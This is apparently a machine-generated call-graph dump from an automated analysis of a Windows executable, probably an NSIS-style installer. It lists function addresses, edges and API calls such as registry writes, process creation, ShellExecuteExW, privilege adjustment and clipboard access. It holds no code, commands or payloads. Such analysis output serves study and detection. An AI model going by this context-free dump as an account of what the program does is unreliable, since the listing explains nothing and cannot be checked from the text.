402ac5 5430->5431 5432 401dad DeleteObject 5430->5432 5432->5431 5433 4022dd 5434 4022f7 5433->5434 5435 4022e4 5433->5435 5436 40640a 17 API calls 5435->5436 5437 4022f1 5436->5437 5438 405a4e MessageBoxIndirectW 5437->5438 5438->5434 5439 701c103d 5440 701c101b 5 API calls 5439->5440 5441 701c1056 5440->5441 5442 401563 5443 402a6b 5442->5443 5446 40632f wsprintfW 5443->5446 5445 402a70 5446->5445 4402 4023e4 4403 402c41 17 API calls 4402->4403 4404 4023f6 4403->4404 4405 402c41 17 API calls 4404->4405 4406 402400 4405->4406 4419 402cd1 4406->4419 4409 402438 4416 402444 4409->4416 4423 402c1f 4409->4423 4410 402c41 17 API calls 4412 40242e lstrlenW 4410->4412 4411 40288b 4412->4409 4414 402463 RegSetValueExW 4415 402479 RegCloseKey 4414->4415 4415->4411 4416->4414 4426 4031d6 4416->4426 4420 402cec 4419->4420 4441 406283 4420->4441 4424 40640a 17 API calls 4423->4424 4425 402c34 4424->4425 4425->4416 4427 403201 4426->4427 4428 4031e5 SetFilePointer 4426->4428 4445 4032de GetTickCount 4427->4445 4428->4427 4431 405f61 ReadFile 4432 403221 4431->4432 4433 4032de 42 API calls 4432->4433 4435 40329e 4432->4435 4434 403238 4433->4434 4434->4435 4436 4032a4 ReadFile 4434->4436 4438 403247 4434->4438 4435->4414 4436->4435 4438->4435 4439 405f61 ReadFile 4438->4439 4440 405f90 WriteFile 4438->4440 4439->4438 4440->4438 4442 406292 4441->4442 4443 40629d RegCreateKeyExW 4442->4443 4444 402410 4442->4444 4443->4444 4444->4409 4444->4410 4444->4411 4446 403436 4445->4446 4447 40330c 4445->4447 4448 402e8e 32 API calls 4446->4448 4458 40345d SetFilePointer 4447->4458 4454 403208 4448->4454 4450 403317 SetFilePointer 4456 40333c 4450->4456 4454->4431 4454->4435 4455 405f90 WriteFile 4455->4456 4456->4454 4456->4455 4457 403417 SetFilePointer 4456->4457 4459 403447 4456->4459 4462 406943 4456->4462 4469 402e8e 4456->4469 4457->4446 4458->4450 4460 405f61 ReadFile 4459->4460 4461 40345a 4460->4461 4461->4456 4463 406968 4462->4463 4464 406970 4462->4464 4463->4456 4464->4463 4465 406a00 GlobalAlloc 4464->4465 4466 4069f7 GlobalFree 4464->4466 4467 406a77 GlobalAlloc 4464->4467 4468 406a6e GlobalFree 4464->4468 4465->4463 4465->4464 4466->4465 4467->4463 4467->4464 4468->4467 4470 402eb7 4469->4470 4471 402e9f 4469->4471 4474 402ec7 GetTickCount 4470->4474 4475 402ebf 4470->4475 4472 402ea8 DestroyWindow 4471->4472 4473 402eaf 4471->4473 4472->4473 4473->4456 4474->4473 4477 402ed5 4474->4477 4484 4067fe 4475->4484 4478 402f0a CreateDialogParamW ShowWindow 4477->4478 4479 402edd 4477->4479 4478->4473 4479->4473 4488 402e72 4479->4488 4481 402eeb wsprintfW 4482 405450 24 API calls 4481->4482 4483 402f08 4482->4483 4483->4473 4485 40681b PeekMessageW 4484->4485 4486 406811 DispatchMessageW 4485->4486 4487 40682b 4485->4487 4486->4485 4487->4473 4489 402e81 4488->4489 4490 402e83 MulDiv 4488->4490 4489->4490 4490->4481 5454 402868 5455 402c41 17 API calls 5454->5455 5456 40286f FindFirstFileW 5455->5456 5457 402897 5456->5457 5461 402882 5456->5461 5462 40632f wsprintfW 5457->5462 5459 4028a0 5463 4063e8 lstrcpynW 5459->5463 5462->5459 5463->5461 5464 401968 5465 402c1f 17 API calls 5464->5465 5466 40196f 5465->5466 5467 402c1f 17 API calls 5466->5467 5468 40197c 5467->5468 5469 402c41 17 API calls 5468->5469 5470 401993 lstrlenW 5469->5470 5472 4019a4 5470->5472 5471 4019e5 5472->5471 5476 4063e8 lstrcpynW 5472->5476 5474 4019d5 5474->5471 5475 4019da lstrlenW 5474->5475 5475->5471 5476->5474 5477 40166a 5478 402c41 17 API calls 5477->5478 5479 401670 5478->5479 5480 40672b 2 API calls 5479->5480 5481 401676 5480->5481 4976 40176f 4977 402c41 17 API calls 4976->4977 4978 401776 4977->4978 4979 401796 4978->4979 4980 40179e 4978->4980 5016 4063e8 lstrcpynW 4979->5016 5017 4063e8 lstrcpynW 4980->5017 4983 40179c 4987 40667c 5 API calls 4983->4987 4984 4017a9 4985 405cbd 3 API calls 4984->4985 4986 4017af lstrcatW 4985->4986 4986->4983 4998 4017bb 4987->4998 4988 40672b 2 API calls 4988->4998 4989 4017f7 4990 405eb9 2 API calls 4989->4990 4990->4998 4992 4017cd CompareFileTime 4992->4998 4993 40188d 4994 405450 24 API calls 4993->4994 4996 401897 4994->4996 4995 4063e8 lstrcpynW 4995->4998 4999 4031d6 44 API calls 4996->4999 4997 405450 24 API calls 5005 401879 4997->5005 4998->4988 4998->4989 4998->4992 4998->4993 4998->4995 5002 40640a 17 API calls 4998->5002 5011 405a4e MessageBoxIndirectW 4998->5011 5014 401864 4998->5014 5015 405ede GetFileAttributesW CreateFileW 4998->5015 5000 4018aa 4999->5000 5001 4018be SetFileTime 5000->5001 5003 4018d0 CloseHandle 5000->5003 5001->5003 5002->4998 5004 4018e1 5003->5004 5003->5005 5006 4018e6 5004->5006 5007 4018f9 5004->5007 5009 40640a 17 API calls 5006->5009 5008 40640a 17 API calls 5007->5008 5010 401901 5008->5010 5012 4018ee lstrcatW 5009->5012 5013 405a4e MessageBoxIndirectW 5010->5013 5011->4998 5012->5010 5013->5005 5014->4997 5014->5005 5015->4998 5016->4983 5017->4984 5021 4027ef 5022 4027f6 5021->5022 5024 402a70 5021->5024 5023 402c1f 17 API calls 5022->5023 5025 4027fd 5023->5025 5026 40280c SetFilePointer 5025->5026 5026->5024 5027 40281c 5026->5027 5029 40632f wsprintfW 5027->5029 5029->5024 5482 401a72 5483 402c1f 17 API calls 5482->5483 5484 401a7b 5483->5484 5485 402c1f 17 API calls 5484->5485 5486 401a20 5485->5486 5487 406af2 5489 406976 5487->5489 5488 4072e1 5489->5488 5490 406a00 GlobalAlloc 5489->5490 5491 4069f7 GlobalFree 5489->5491 5492 406a77 GlobalAlloc 5489->5492 5493 406a6e GlobalFree 5489->5493 5490->5488 5490->5489 5491->5490 5492->5488 5492->5489 5493->5492 5494 401573 5495 401583 ShowWindow 5494->5495 5496 40158c 5494->5496 5495->5496 5497 402ac5 5496->5497 5498 40159a ShowWindow 5496->5498 5498->5497 5499 401cf3 5500 402c1f 17 API calls 5499->5500 5501 401cf9 IsWindow 5500->5501 5502 401a20 5501->5502 5503 402df3 5504 402e05 SetTimer 5503->5504 5505 402e1e 5503->5505 5504->5505 5506 402e6c 5505->5506 5507 402e72 MulDiv 5505->5507 5508 402e2c wsprintfW SetWindowTextW SetDlgItemTextW 5507->5508 5508->5506 5510 4014f5 SetForegroundWindow 5511 402ac5 5510->5511 5512 402576 5513 402c41 17 API calls 5512->5513 5514 40257d 5513->5514 5517 405ede GetFileAttributesW CreateFileW 5514->5517 5516 402589 5517->5516 5221 401b77 5222 401b84 5221->5222 5223 401bc8 5221->5223 5224 401c0d 5222->5224 5231 401b9b 5222->5231 5225 401bf2 GlobalAlloc 5223->5225 5226 401bcd 5223->5226 5227 40640a 17 API calls 5224->5227 5236 4022f7 5224->5236 5228 40640a 17 API calls 5225->5228 5226->5236 5242 4063e8 lstrcpynW 5226->5242 5230 4022f1 5227->5230 5228->5224 5234 405a4e MessageBoxIndirectW 5230->5234 5240 4063e8 lstrcpynW 5231->5240 5232 401bdf GlobalFree 5232->5236 5234->5236 5235 401baa 5241 4063e8 lstrcpynW 5235->5241 5238 401bb9 5243 4063e8 lstrcpynW 5238->5243 5240->5235 5241->5238 5242->5232 5243->5236 5244 4024f8 5245 402c81 17 API calls 5244->5245 5246 402502 5245->5246 5247 402c1f 17 API calls 5246->5247 5248 40250b 5247->5248 5249 402533 RegEnumValueW 5248->5249 5250 402527 RegEnumKeyW 5248->5250 5253 40288b 5248->5253 5251 40254f RegCloseKey 5249->5251 5252 402548 5249->5252 5250->5251 5251->5253 5252->5251 5255 40167b 5256 402c41 17 API calls 5255->5256 5257 401682 5256->5257 5258 402c41 17 API calls 5257->5258 5259 40168b 5258->5259 5260 402c41 17 API calls 5259->5260 5261 401694 MoveFileW 5260->5261 5262 4016a0 5261->5262 5263 4016a7 5261->5263 5264 401423 24 API calls 5262->5264 5265 40672b 2 API calls 5263->5265 5267 402250 5263->5267 5264->5267 5266 4016b6 5265->5266 5266->5267 5268 4061ae 36 API calls 5266->5268 5268->5262 5525 401e7d 5526 402c41 17 API calls 5525->5526 5527 401e83 5526->5527 5528 402c41 17 API calls 5527->5528 5529 401e8c 5528->5529 5530 402c41 17 API calls 5529->5530 5531 401e95 5530->5531 5532 402c41 17 API calls 5531->5532 5533 401e9e 5532->5533 5534 401423 24 API calls 5533->5534 5535 401ea5 5534->5535 5542 405a14 ShellExecuteExW 5535->5542 5537 401ee7 5538 40288b 5537->5538 5543 406873 WaitForSingleObject 5537->5543 5540 401f01 CloseHandle 5540->5538 5542->5537 5544 40688d 5543->5544 5545 40689f GetExitCodeProcess 5544->5545 5546 4067fe 2 API calls 5544->5546 5545->5540 5547 406894 WaitForSingleObject 5546->5547 5547->5544 5548 4019ff 5549 402c41 17 API calls 5548->5549 5550 401a06 5549->5550 5551 402c41 17 API calls 5550->5551 5552 401a0f 5551->5552 5553 401a16 lstrcmpiW 5552->5553 5554 401a28 lstrcmpW 5552->5554 5555 401a1c 5553->5555 5554->5555 5556 401000 5557 401037 BeginPaint GetClientRect 5556->5557 5558 40100c DefWindowProcW 5556->5558 5560 4010f3 5557->5560 5561 401179 5558->5561 5562 401073 CreateBrushIndirect FillRect DeleteObject 5560->5562 5563 4010fc 5560->5563 5562->5560 5564 401102 CreateFontIndirectW 5563->5564 5565 401167 EndPaint 5563->5565 5564->5565 5566 401112 6 API calls 5564->5566 5565->5561 5566->5565 5567 401503 5568 40150b 5567->5568 5570 40151e 5567->5570 5569 402c1f 17 API calls 5568->5569 5569->5570 4491 402484 4502 402c81 4491->4502 4494 402c41 17 API calls 4495 402497 4494->4495 4496 4024a2 RegQueryValueExW 4495->4496 4500 40288b 4495->4500 4497 4024c8 RegCloseKey 4496->4497 4498 4024c2 4496->4498 4497->4500 4498->4497 4507 40632f wsprintfW 4498->4507 4503 402c41 17 API calls 4502->4503 4504 402c98 4503->4504 4505 406255 RegOpenKeyExW 4504->4505 4506 40248e 4505->4506 4506->4494 4507->4497 5571 701c1058 5573 701c1074 5571->5573 5572 701c10dd 5573->5572 5574 701c1516 GlobalFree 5573->5574 5575 701c1092 5573->5575 5574->5575 5576 701c1516 GlobalFree 5575->5576 5577 701c10a2 5576->5577 5578 701c10a9 GlobalSize 5577->5578 5579 701c10b2 5577->5579 5578->5579 5580 701c10c7 5579->5580 5581 701c10b6 GlobalAlloc 5579->5581 5583 701c10d2 GlobalFree 5580->5583 5582 701c153d 3 API calls 5581->5582 5582->5580 5583->5572 5584 402104 5585 402c41 17 API calls 5584->5585 5586 40210b 5585->5586 5587 402c41 17 API calls 5586->5587 5588 402115 5587->5588 5589 402c41 17 API calls 5588->5589 5590 40211f 5589->5590 5591 402c41 17 API calls 5590->5591 5592 402129 5591->5592 5593 402c41 17 API calls 5592->5593 5595 402133 5593->5595 5594 402172 CoCreateInstance 5599 402191 5594->5599 5595->5594 5596 402c41 17 API calls 5595->5596 5596->5594 5597 401423 24 API calls 5598 402250 5597->5598 5599->5597 5599->5598 5600 701c18d9 5601 701c18fc 5600->5601 5602 701c1931 GlobalFree 5601->5602 5603 701c1943 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 5601->5603 5602->5603 5604 701c1272 2 API calls 5603->5604 5605 701c1ace GlobalFree GlobalFree 5604->5605 4751 403e86 4752 403fd9 4751->4752 4753 403e9e 4751->4753 4754 40402a 4752->4754 4755 403fea GetDlgItem GetDlgItem 4752->4755 4753->4752 4756 403eaa 4753->4756 4760 404084 4754->4760 4768 401389 2 API calls 4754->4768 4759 40435f 18 API calls 4755->4759 4757 403eb5 SetWindowPos 4756->4757 4758 403ec8 4756->4758 4757->4758 4761 403ee5 4758->4761 4762 403ecd ShowWindow 4758->4762 4763 404014 SetClassLongW 4759->4763 4764 4043ab SendMessageW 4760->4764 4784 403fd4 4760->4784 4765 403f07 4761->4765 4766 403eed DestroyWindow 4761->4766 4762->4761 4767 40140b 2 API calls 4763->4767 4779 404096 4764->4779 4770 403f0c SetWindowLongW 4765->4770 4771 403f1d 4765->4771 4769 404309 4766->4769 4767->4754 4772 40405c 4768->4772 4778 404319 ShowWindow 4769->4778 4769->4784 4770->4784 4775 403fc6 4771->4775 4776 403f29 GetDlgItem 4771->4776 4772->4760 4777 404060 SendMessageW 4772->4777 4773 40140b 2 API calls 4773->4779 4774 4042ea DestroyWindow EndDialog 4774->4769 4832 4043c6 4775->4832 4780 403f59 4776->4780 4781 403f3c SendMessageW IsWindowEnabled 4776->4781 4777->4784 4778->4784 4779->4773 4779->4774 4783 40640a 17 API calls 4779->4783 4779->4784 4789 40435f 18 API calls 4779->4789 4813 40422a DestroyWindow 4779->4813 4823 40435f 4779->4823 4785 403f66 4780->4785 4786 403f79 4780->4786 4787 403fad SendMessageW 4780->4787 4795 403f5e 4780->4795 4781->4780 4781->4784 4783->4779 4785->4787 4785->4795 4790 403f81 4786->4790 4791 403f96 4786->4791 4787->4775 4789->4779 4793 40140b 2 API calls 4790->4793 4794 40140b 2 API calls 4791->4794 4792 403f94 4792->4775 4793->4795 4796 403f9d 4794->4796 4829 404338 4795->4829 4796->4775 4796->4795 4798 404111 GetDlgItem 4799 404126 4798->4799 4800 40412e ShowWindow KiUserCallbackDispatcher 4798->4800 4799->4800 4826 404381 EnableWindow 4800->4826 4802 404158 EnableWindow 4807 40416c 4802->4807 4803 404171 GetSystemMenu EnableMenuItem SendMessageW 4804 4041a1 SendMessageW 4803->4804 4803->4807 4804->4807 4806 403e67 18 API calls 4806->4807 4807->4803 4807->4806 4827 404394 SendMessageW 4807->4827 4828 4063e8 lstrcpynW 4807->4828 4809 4041d0 lstrlenW 4810 40640a 17 API calls 4809->4810 4811 4041e6 SetWindowTextW 4810->4811 4812 401389 2 API calls 4811->4812 4812->4779 4813->4769 4814 404244 CreateDialogParamW 4813->4814 4814->4769 4815 404277 4814->4815 4816 40435f 18 API calls 4815->4816 4817 404282 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4816->4817 4818 401389 2 API calls 4817->4818 4819 4042c8 4818->4819 4819->4784 4820 4042d0 ShowWindow 4819->4820 4821 4043ab SendMessageW 4820->4821 4822 4042e8 4821->4822 4822->4769 4824 40640a 17 API calls 4823->4824 4825 40436a SetDlgItemTextW 4824->4825 4825->4798 4826->4802 4827->4807 4828->4809 4830 404345 SendMessageW 4829->4830 4831 40433f 4829->4831 4830->4792 4831->4830 4833 404489 4832->4833 4834 4043de GetWindowLongW 4832->4834 4833->4784 4834->4833 4835 4043f3 4834->4835 4835->4833 4836 404420 GetSysColor 4835->4836 4837 404423 4835->4837 4836->4837 4838 404433 SetBkMode 4837->4838 4839 404429 SetTextColor 4837->4839 4840 404451 4838->4840 4841 40444b GetSysColor 4838->4841 4839->4838 4842 404462 4840->4842 4843 404458 SetBkColor 4840->4843 4841->4840 4842->4833 4844 404475 DeleteObject 4842->4844 4845 40447c CreateBrushIndirect 4842->4845 4843->4842 4844->4845 4845->4833 5606 401f06 5607 402c41 17 API calls 5606->5607 5608 401f0c 5607->5608 5609 405450 24 API calls 5608->5609 5610 401f16 5609->5610 5611 4059d1 2 API calls 5610->5611 5612 401f1c 5611->5612 5613 401f3f CloseHandle 5612->5613 5615 406873 5 API calls 5612->5615 5616 40288b 5612->5616 5613->5616 5617 401f31 5615->5617 5617->5613 5619 40632f wsprintfW 5617->5619 5619->5613 5620 701c16d4 5621 701c1703 5620->5621 5622 701c1b5f 22 API calls 5621->5622 5623 701c170a 5622->5623 5624 701c171d 5623->5624 5625 701c1711 5623->5625 5627 701c1744 5624->5627 5628 701c1727 5624->5628 5626 701c1272 2 API calls 5625->5626 5632 701c171b 5626->5632 5630 701c176e 5627->5630 5631 701c174a 5627->5631 5629 701c153d 3 API calls 5628->5629 5633 701c172c 5629->5633 5635 701c153d 3 API calls 5630->5635 5634 701c15b4 3 API calls 5631->5634 5636 701c15b4 3 API calls 5633->5636 5637 701c174f 5634->5637 5635->5632 5638 701c1732 5636->5638 5639 701c1272 2 API calls 5637->5639 5640 701c1272 2 API calls 5638->5640 5641 701c1755 GlobalFree 5639->5641 5642 701c1738 GlobalFree 5640->5642 5641->5632 5643 701c1769 GlobalFree 5641->5643 5642->5632 5643->5632 5644 404809 5645 404819 5644->5645 5646 40483f 5644->5646 5647 40435f 18 API calls 5645->5647 5648 4043c6 8 API calls 5646->5648 5649 404826 SetDlgItemTextW 5647->5649 5650 40484b 5648->5650 5649->5646 5651 701c2c57 5652 701c2c6f 5651->5652 5653 701c158f 2 API calls 5652->5653 5654 701c2c8a 5653->5654 5655 40190c 5656 401943 5655->5656 5657 402c41 17 API calls 5656->5657 5658 401948 5657->5658 5659 405afa 67 API calls 5658->5659 5660 401951 5659->5660 5661 40230c 5662 402314 5661->5662 5665 40231a 5661->5665 5663 402c41 17 API calls 5662->5663 5663->5665 5664 402328 5667 402c41 17 API calls 5664->5667 5669 402336 5664->5669 5665->5664 5666 402c41 17 API calls 5665->5666 5666->5664 5667->5669 5668 402c41 17 API calls 5670 40233f WritePrivateProfileStringW 5668->5670 5669->5668 5671 401f8c 5672 402c41 17 API calls 5671->5672 5673 401f93 5672->5673 5674 4067c2 5 API calls 5673->5674 5675 401fa2 5674->5675 5676 402026 5675->5676 5677 401fbe GlobalAlloc 5675->5677 5677->5676 5678 401fd2 5677->5678 5679 4067c2 5 API calls 5678->5679 5680 401fd9 5679->5680 5681 4067c2 5 API calls 5680->5681 5682 401fe3 5681->5682 5682->5676 5686 40632f wsprintfW 5682->5686 5684 402018 5687 40632f wsprintfW 5684->5687 5686->5684 5687->5676 4947 40238e 4948 4023c1 4947->4948 4949 402396 4947->4949 4951 402c41 17 API calls 4948->4951 4950 402c81 17 API calls 4949->4950 4952 40239d 4950->4952 4953 4023c8 4951->4953 4954 4023a7 4952->4954 4956 4023d5 4952->4956 4959 402cff 4953->4959 4957 402c41 17 API calls 4954->4957 4958 4023ae RegDeleteValueW RegCloseKey 4957->4958 4958->4956 4960 402d13 4959->4960 4961 402d0c 4959->4961 4960->4961 4963 402d44 4960->4963 4961->4956 4964 406255 RegOpenKeyExW 4963->4964 4965 402d72 4964->4965 4966 402d76 4965->4966 4967 402dec 4965->4967 4968 402d98 RegEnumKeyW 4966->4968 4969 402daf RegCloseKey 4966->4969 4970 402dd0 RegCloseKey 4966->4970 4972 402d44 6 API calls 4966->4972 4967->4961 4968->4966 4968->4969 4971 4067c2 5 API calls 4969->4971 4970->4967 4973 402dbf 4971->4973 4972->4966 4974 402de0 RegDeleteKeyW 4973->4974 4975 402dc3 4973->4975 4974->4967 4975->4967 5688 40190f 5689 402c41 17 API calls 5688->5689 5690 401916 5689->5690 5691 405a4e MessageBoxIndirectW 5690->5691 5692 40191f 5691->5692 5693 40558f 5694 4055b0 GetDlgItem GetDlgItem GetDlgItem 5693->5694 5695 405739 5693->5695 5738 404394 SendMessageW 5694->5738 5697 405742 GetDlgItem CreateThread CloseHandle 5695->5697 5698 40576a 5695->5698 5697->5698 5700 405795 5698->5700 5701 405781 ShowWindow ShowWindow 5698->5701 5702 4057ba 5698->5702 5699 405620 5705 405627 GetClientRect GetSystemMetrics SendMessageW SendMessageW 5699->5705 5703 4057f5 5700->5703 5707 4057a9 5700->5707 5708 4057cf ShowWindow 5700->5708 5740 404394 SendMessageW 5701->5740 5704 4043c6 8 API calls 5702->5704 5703->5702 5714 405803 SendMessageW 5703->5714 5709 4057c8 5704->5709 5712 405695 5705->5712 5713 405679 SendMessageW SendMessageW 5705->5713 5715 404338 SendMessageW 5707->5715 5710 4057e1 5708->5710 5711 4057ef 5708->5711 5716 405450 24 API calls 5710->5716 5717 404338 SendMessageW 5711->5717 5718 4056a8 5712->5718 5719 40569a SendMessageW 5712->5719 5713->5712 5714->5709 5720 40581c CreatePopupMenu 5714->5720 5715->5702 5716->5711 5717->5703 5722 40435f 18 API calls 5718->5722 5719->5718 5721 40640a 17 API calls 5720->5721 5723 40582c AppendMenuW 5721->5723 5724 4056b8 5722->5724 5725 405849 GetWindowRect 5723->5725 5726 40585c TrackPopupMenu 5723->5726 5727 4056c1 ShowWindow 5724->5727 5728 4056f5 GetDlgItem SendMessageW 5724->5728 5725->5726 5726->5709 5729 405877 5726->5729 5730 4056e4 5727->5730 5731 4056d7 ShowWindow 5727->5731 5728->5709 5732 40571c SendMessageW SendMessageW 5728->5732 5733 405893 SendMessageW 5729->5733 5739 404394 SendMessageW 5730->5739 5731->5730 5732->5709 5733->5733 5734 4058b0 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 5733->5734 5736 4058d5 SendMessageW 5734->5736 5736->5736 5737 4058fe GlobalUnlock SetClipboardData CloseClipboard 5736->5737 5737->5709 5738->5699 5739->5728 5740->5700 5741 401491 5742 405450 24 API calls 5741->5742 5743 401498 5742->5743 5751 401d14 5752 402c1f 17 API calls 5751->5752 5753 401d1b 5752->5753 5754 402c1f 17 API calls 5753->5754 5755 401d27 GetDlgItem 5754->5755 5756 402592 5755->5756 5757 402994 5758 402c1f 17 API calls 5757->5758 5759 4029ae 5758->5759 5760 4029d5 5759->5760 5761 4029ee 5759->5761 5769 40288b 5759->5769 5762 4029da 5760->5762 5770 4029eb 5760->5770 5763 402a08 5761->5763 5764 4029f8 5761->5764 5771 4063e8 lstrcpynW 5762->5771 5766 40640a 17 API calls 5763->5766 5765 402c1f 17 API calls 5764->5765 5765->5770 5766->5770 5770->5769 5772 40632f wsprintfW 5770->5772 5771->5769 5772->5769 5773 404495 lstrcpynW lstrlenW 5774 403a96 5775 403aa1 5774->5775 5776 403aa5 5775->5776 5777 403aa8 GlobalAlloc 5775->5777 5777->5776 5778 402598 5779 4025c7 5778->5779 5780 4025ac 5778->5780 5782 4025fb 5779->5782 5783 4025cc 5779->5783 5781 402c1f 17 API calls 5780->5781 5788 4025b3 5781->5788 5785 402c41 17 API calls 5782->5785 5784 402c41 17 API calls 5783->5784 5786 4025d3 WideCharToMultiByte lstrlenA 5784->5786 5787 402602 lstrlenW 5785->5787 5786->5788 5787->5788 5790 405fbf 5 API calls 5788->5790 5791 402645 5788->5791 5792 40262f 5788->5792 5789 405f90 WriteFile 5789->5791 5790->5792 5792->5789 5792->5791 5793 40451e 5794 404536 5793->5794 5798 404650 5793->5798 5799 40435f 18 API calls 5794->5799 5795 4046ba 5796 404784 5795->5796 5797 4046c4 GetDlgItem 5795->5797 5804 4043c6 8 API calls 5796->5804 5800 404745 5797->5800 5801 4046de 5797->5801 5798->5795 5798->5796 5802 40468b GetDlgItem SendMessageW 5798->5802 5803 40459d 5799->5803 5800->5796 5805 404757 5800->5805 5801->5800 5808 404704 SendMessageW LoadCursorW SetCursor 5801->5808 5826 404381 EnableWindow 5802->5826 5807 40435f 18 API calls 5803->5807 5816 40477f 5804->5816 5809 40476d 5805->5809 5810 40475d SendMessageW 5805->5810 5812 4045aa CheckDlgButton 5807->5812 5827 4047cd 5808->5827 5815 404773 SendMessageW 5809->5815 5809->5816 5810->5809 5811 4046b5 5817 4047a9 SendMessageW 5811->5817 5824 404381 EnableWindow 5812->5824 5815->5816 5817->5795 5819 4045c8 GetDlgItem 5825 404394 SendMessageW 5819->5825 5821 4045de SendMessageW 5822 404604 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5821->5822 5823 4045fb GetSysColor 5821->5823 5822->5816 5823->5822 5824->5819 5825->5821 5826->5811 5830 405a14 ShellExecuteExW 5827->5830 5829 404733 LoadCursorW SetCursor 5829->5800 5830->5829 5831 40149e 5832 4014ac PostQuitMessage 5831->5832 5833 4022f7 5831->5833 5832->5833 5834 401c1f 5835 402c1f 17 API calls 5834->5835 5836 401c26 5835->5836 5837 402c1f 17 API calls 5836->5837 5838 401c33 5837->5838 5839 401c48 5838->5839 5840 402c41 17 API calls 5838->5840 5841 401c58 5839->5841 5842 402c41 17 API calls 5839->5842 5840->5839 5843 401c63 5841->5843 5844 401caf 5841->5844 5842->5841 5846 402c1f 17 API calls 5843->5846 5845 402c41 17 API calls 5844->5845 5847 401cb4 5845->5847 5848 401c68 5846->5848 5849 402c41 17 API calls 5847->5849 5850 402c1f 17 API calls 5848->5850 5851 401cbd FindWindowExW 5849->5851 5852 401c74 5850->5852 5855 401cdf 5851->5855 5853 401c81 SendMessageTimeoutW 5852->5853 5854 401c9f SendMessageW 5852->5854 5853->5855 5854->5855 5856 402821 5857 402827 5856->5857 5858 402ac5 5857->5858 5859 40282f FindClose 5857->5859 5859->5858 5860 701c22fd 5861 701c2367 5860->5861 5862 701c2372 GlobalAlloc 5861->5862 5863 701c2391 5861->5863 5862->5861 5864 4015a3 5865 402c41 17 API calls 5864->5865 5866 4015aa SetFileAttributesW 5865->5866 5867 4015bc 5866->5867 4508 4034a5 SetErrorMode GetVersion 4509 4034e4 4508->4509 4510 4034ea 4508->4510 4511 4067c2 5 API calls 4509->4511 4512 406752 3 API calls 4510->4512 4511->4510 4513 403500 lstrlenA 4512->4513 4513->4510 4514 403510 4513->4514 4515 4067c2 5 API calls 4514->4515 4516 403517 4515->4516 4517 4067c2 5 API calls 4516->4517 4518 40351e 4517->4518 4519 4067c2 5 API calls 4518->4519 4520 40352a #17 OleInitialize SHGetFileInfoW 4519->4520 4598 4063e8 lstrcpynW 4520->4598 4523 403576 GetCommandLineW 4599 4063e8 lstrcpynW 4523->4599 4525 403588 4526 405cea CharNextW 4525->4526 4527 4035ad CharNextW 4526->4527 4528 4036d7 GetTempPathW 4527->4528 4536 4035c6 4527->4536 4600 403474 4528->4600 4530 4036ef 4531 4036f3 GetWindowsDirectoryW lstrcatW 4530->4531 4532 403749 DeleteFileW 4530->4532 4533 403474 12 API calls 4531->4533 4610 402f30 GetTickCount GetModuleFileNameW 4532->4610 4537 40370f 4533->4537 4534 405cea CharNextW 4534->4536 4536->4534 4542 4036c2 4536->4542 4543 4036c0 4536->4543 4537->4532 4539 403713 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 4537->4539 4538 40375d 4544 403800 4538->4544 4548 405cea CharNextW 4538->4548 4593 403810 4538->4593 4541 403474 12 API calls 4539->4541 4546 403741 4541->4546 4696 4063e8 lstrcpynW 4542->4696 4543->4528 4640 403ad8 4544->4640 4546->4532 4546->4593 4561 40377c 4548->4561 4550 40394a 4553 403952 GetCurrentProcess OpenProcessToken 4550->4553 4554 4039ce ExitProcess 4550->4554 4551 40382a 4708 405a4e 4551->4708 4559 40396a LookupPrivilegeValueW AdjustTokenPrivileges 4553->4559 4560 40399e 4553->4560 4557 403840 4563 4059b9 5 API calls 4557->4563 4558 4037da 4562 405dc5 18 API calls 4558->4562 4559->4560 4564 4067c2 5 API calls 4560->4564 4561->4557 4561->4558 4565 4037e6 4562->4565 4566 403845 lstrcatW 4563->4566 4567 4039a5 4564->4567 4565->4593 4697 4063e8 lstrcpynW 4565->4697 4568 403861 lstrcatW lstrcmpiW 4566->4568 4569 403856 lstrcatW 4566->4569 4570 4039ba ExitWindowsEx 4567->4570 4571 4039c7 4567->4571 4573 40387d 4568->4573 4568->4593 4569->4568 4570->4554 4570->4571 4574 40140b 2 API calls 4571->4574 4576 403882 4573->4576 4577 403889 4573->4577 4574->4554 4575 4037f5 4698 4063e8 lstrcpynW 4575->4698 4579 40591f 4 API calls 4576->4579 4580 40599c 2 API calls 4577->4580 4582 403887 4579->4582 4581 40388e SetCurrentDirectoryW 4580->4581 4583 4038a9 4581->4583 4584 40389e 4581->4584 4582->4581 4713 4063e8 lstrcpynW 4583->4713 4712 4063e8 lstrcpynW 4584->4712 4587 40640a 17 API calls 4588 4038e8 DeleteFileW 4587->4588 4589 4038f5 CopyFileW 4588->4589 4595 4038b7 4588->4595 4589->4595 4590 40393e 4591 4061ae 36 API calls 4590->4591 4591->4593 4592 4061ae 36 API calls 4592->4595 4699 4039e6 4593->4699 4594 40640a 17 API calls 4594->4595 4595->4587 4595->4590 4595->4592 4595->4594 4597 403929 CloseHandle 4595->4597 4714 4059d1 CreateProcessW 4595->4714 4597->4595 4598->4523 4599->4525 4601 40667c 5 API calls 4600->4601 4603 403480 4601->4603 4602 40348a 4602->4530 4603->4602 4604 405cbd 3 API calls 4603->4604 4605 403492 4604->4605 4606 40599c 2 API calls 4605->4606 4607 403498 4606->4607 4717 405f0d 4607->4717 4721 405ede GetFileAttributesW CreateFileW 4610->4721 4612 402f73 4639 402f80 4612->4639 4722 4063e8 lstrcpynW 4612->4722 4614 402f96 4615 405d09 2 API calls 4614->4615 4616 402f9c 4615->4616 4723 4063e8 lstrcpynW 4616->4723 4618 402fa7 GetFileSize 4619 4030a8 4618->4619 4638 402fbe 4618->4638 4620 402e8e 32 API calls 4619->4620 4622 4030af 4620->4622 4621 403447 ReadFile 4621->4638 4624 4030eb GlobalAlloc 4622->4624 4622->4639 4725 40345d SetFilePointer 4622->4725 4623 403143 4626 402e8e 32 API calls 4623->4626 4625 403102 4624->4625 4631 405f0d 2 API calls 4625->4631 4626->4639 4628 4030cc 4629 403447 ReadFile 4628->4629 4632 4030d7 4629->4632 4630 402e8e 32 API calls 4630->4638 4633 403113 CreateFileW 4631->4633 4632->4624 4632->4639 4634 40314d 4633->4634 4633->4639 4724 40345d SetFilePointer 4634->4724 4636 40315b 4637 4031d6 44 API calls 4636->4637 4637->4639 4638->4619 4638->4621 4638->4623 4638->4630 4638->4639 4639->4538 4641 4067c2 5 API 